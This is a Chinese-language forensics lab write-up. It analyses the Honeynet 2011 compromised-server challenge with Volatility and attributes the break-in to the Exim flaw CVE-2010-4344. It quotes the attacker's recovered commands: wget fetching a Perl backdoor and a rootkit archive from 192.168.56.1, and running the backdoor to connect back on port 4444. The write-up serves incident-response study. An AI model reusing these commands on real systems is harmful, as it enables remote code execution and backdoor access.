第一次 按照大神的博客，完成这个实验，希望后来者，少入点坑

工具介绍：volatility

volatility是一款开源的内存取证分析工具，由python编写，支持各种操作系统。可以通过插件来拓展功能。kali下集成了该工具，命令行输入volatility使用该工具。

Volatility‐f [image]­-‐profile=[profile]

[plugin]

--info查看扫描检查、插件、地址空间等信息

-h查看帮助信息

[plugin]–h指定插件的帮助信息

--output-file=[file]检查结果输出

实验镜像：

我们在这里即将分析的镜像是Challenge 7 of the Forensic Challenge 2011–Forensic

Analysis of a Compromised Server的题目，我们可以在https://www.honeynet.org/challenges/2011_7_compromised_server这下载到相应的镜像文件。

注意：三个都要下载。

第一步分析镜像文件

分析镜像文件，我们可以通过挂载的方式，来确定镜像的系统的版本，我们才可以制作相应的profile，或者搜索相应的profile。

我们先挂载镜像mount -o loop victoria-v8.sda1.img /mnt将镜像挂载到/mnt。

切换到/mnt目录

cd /mnt

我们可以看到相应的系统文件。

cat /mnt/etc/issue

查看系统版本

镜像系统版本是Debian发行版5.0

在var/log目录下，

cat dmesg

系统内核版本是2.6.26。

PS：dmesg用来显示开机信息，kernel会将开机信息存储在ring

buffer中。您若是开机时来不及查看信息，可利用dmesg来查看。开机信息亦保存在/var/log目录中，名称为dmesg的文件里。

第二步

获取相应profile

我们有两种方法获取profile。

第一，我们可以创建我们自己的profile。

Volatility自带一些windows系统的profile，Linux系统的Profile需要自己制作，制作的方法如下：

(实际是将module.dwarf和system.map打包成一个zip文件，接着将zip文件移动到volatility/plugins/overlays/linux/中。)

Linux的Profile文件是一个zip的压缩包。

第二，我们可以利用搜索引擎或者已公开的profile，例如，我们就可以看到一些已经公布的profile。我这里使用的是第二种方法，在公开的项目中找到了Debian 5.0的profile.参考网址：

紧接着，我们需要将profile放入对应的位置：

注意：坑：

kali2.0,中volatility已经安装了，这个profile的插件应该放在python的安装目录中，参考我的放置目录：

/usr/lib/python2.7/dist-packages/volatility/plugins/overlays/linux/

通过volatility --info测试

测试前

测试后

第三步

开始分析文件

volatility -f ./victoria-v8.sda1.img

--profile=LinuxDebian5010x86 -h

可以看到针对linux镜像的命令，以及相应功能介绍。

通过

volatility -f ./victoria-v8.memdump.img

--profile=LinuxDebian5010x86 linux_psaux

我们可以查看进程。

可疑连接

通过

volatility -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86

linux_netstat

我们可以查看各种网络相关信息,如网络连接,路由表,接口状态

等。

volatility -f ./victoria-v8.memdump.img  --profile=LinuxDebian5010x86 linux_bash

scp命令复制了exim4目录下的所有文件，

scp是linux系统下基于ssh登陆进行安全的远程文件拷贝命令。

我们在/mnt/var/log/exim4目录下的Exim reject log中看到，

Wget：下载并保存

wget http://192.168.56.1/c.pl -O /tmp/c.pl

wget http://192.168.56.1/rk.tar -O

/tmp/rk.tar; sleep 1000

查看两个文件

.pl的简单分析表明，它是一个perl脚本，用于创建一个c程序，该程序编译给支持SUID的可执行文件打开一个后门并向攻击者发送信息。

c.pl被下载，并且编译的SUID在端口4444中打开了一个到192.168.56.1的连接，如下所示：

wget http://192.168.56.1/c.pl -O /tmp/c.pl;

perl /tmp/c.pl 192.168.56.1 4444

继续回到bash分析：

python vol.py -f

./victoria-v8.memdump.img –profile=LinuxDebian5010x86 linux_bash

攻击者将 /dev/sda1整个dump下来，并通过 8888端口发送了出去。

Exim reject日志显示IP 192.168.56.101作为要发送邮件的主机：

abcde.com，owned.org和h0n3yn3t-pr0j3ct.com

python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_netstat我们发现有两个已经关闭的连接。

基本上证明了，192.168.56.101也是一个攻击IP。

我们之后通过上面的信息，知道攻击者是通过Exim成功攻击了这台服务器。通过搜索exim相关的漏洞我们基本可以确定

攻击是CVE-2010-4344

此外，我们知道攻击者成功攻击了此台服务器

但是我们从cat /mnt/var/log/auth.log |grep Failed中看到攻击者一直尝试以Ulysses的账户名登录，却没登录成功。

总结：

•攻击者可能只是一个脚本小子，利用已有的cve公布了的exp进入到了系统并没有成功登录账户其次

通过分析，我们可以知道攻击的发起

以及结束 并且我们了解到攻击者简单尝试了登录账户32次后就放弃了。